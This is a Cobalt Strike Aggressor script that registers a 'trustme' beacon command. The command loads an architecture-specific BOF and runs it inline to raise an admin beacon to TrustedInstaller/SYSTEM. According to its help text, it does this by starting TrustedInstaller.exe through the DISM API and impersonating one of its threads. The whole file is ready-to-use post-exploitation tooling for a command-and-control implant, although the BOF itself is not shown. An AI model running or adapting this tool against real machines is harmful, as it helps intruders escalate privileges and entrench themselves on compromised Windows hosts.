#
# trustme.cna - Aggressor script for the TrustedInstaller impersonation BOF
#
# Usage: trustme
# Requires: Admin beacon with SeDebugPrivilege available
# Revert: rev2self
#
# Register "trustme" in the beacon console. The second argument is the
# one-line summary shown in the command list; the third is the long help
# text shown for the command. The help text is assembled piecewise so each
# line of it can be read and edited on its own; the resulting string is
# identical to a single literal.
beacon_command_register(
    "trustme",
    "Impersonate TrustedInstaller via DISM API trigger and thread impersonation.",
    "Synopsis: trustme\n\n" .
    "Elevates the current beacon thread to TrustedInstaller/SYSTEM context.\n" .
    "Uses the DISM API to start TrustedInstaller.exe without touching SCM,\n" .
    "then walks processes via NtGetNextProcess and impersonates a thread.\n\n" .
    "Requires: Elevated (admin) beacon.\n" .
    "Revert: rev2self"
);
# trustme: load the architecture-specific object file and run it in the
# current beacon. $1 is the beacon id supplied by the console. The command
# takes no arguments; the work itself happens in the BOF, which per the
# command's help text starts TrustedInstaller.exe through the DISM API and
# impersonates one of its threads. The beacon keeps the impersonated token
# until rev2self is issued.
alias trustme {
    local('$bid $arch $objname $fh $bof');
    $bid = $1;

    # The BOF needs an elevated token to begin with; refuse early rather than
    # fail inside the object file.
    if (!-isadmin $bid) {
        berror($bid, "trustme requires an elevated (admin) beacon.");
        return;
    }

    # Pick the object file matching the beacon's architecture (x86 or x64)
    # from the directory this script was loaded from.
    $arch    = barch($bid);
    $objname = "trustme. $+ $arch $+ .o";
    $fh      = openf(script_resource($objname));
    $bof     = readb($fh, -1);
    closef($fh);

    # An empty read means the object file is missing or unreadable next to
    # the script; tell the operator which file was expected.
    if (strlen($bof) == 0) {
        berror($bid, "Could not read $objname $+ , is the object file in the same directory as this script?");
        return;
    }

    # Entry point "go" with no packed arguments.
    btask($bid, "Attempting to impersonate TrustedInstaller via DISM...");
    beacon_inline_execute($bid, $bof, "go", $null);
}